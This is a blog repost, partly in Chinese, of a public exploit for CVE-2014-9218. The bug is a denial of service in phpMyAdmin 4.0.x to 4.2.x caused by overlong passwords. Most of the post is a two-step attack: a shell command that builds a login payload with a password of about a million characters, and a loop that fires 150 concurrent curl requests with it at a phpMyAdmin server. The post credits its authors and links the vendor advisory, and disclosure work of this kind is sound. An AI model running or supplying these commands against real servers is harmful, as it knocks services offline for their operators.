欢迎光临
我们一直在努力
"

phpMyAdmin 4.0.x, 4.1.x, 4.2.x – DoS

 

=============
说明:
=============
phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 允许攻击者通过长密码造成资源耗尽.
CVE-2014-9218
*1 – 创建 payload.*

$ echo -n “pma_username=xxxxxxxx&pma_password=” > payload && printf “%s”
{1..1000000} >> payload

*2 -执行DOS攻击.*

$ for i in seq 1 150; do (curl –data @payload
http://your-webserver-installation/phpmyadmin/ –silent > /dev/null &) done

=============
Authors:
=============

— Javer Nieto — http://www.behindthefirewalls.com
— Andres Rojas — http://www.devconsole.info
=============

References:
====================================================================

*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php

转载请注明: 转载自Legend‘s BLog

本文链接地址: phpMyAdmin 4.0.x, 4.1.x, 4.2.x – DoS



未经允许不得转载:Legend‘s BLog » phpMyAdmin 4.0.x, 4.1.x, 4.2.x – DoS

分享到:更多 ()

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

无觅相关文章插件,快速提升流量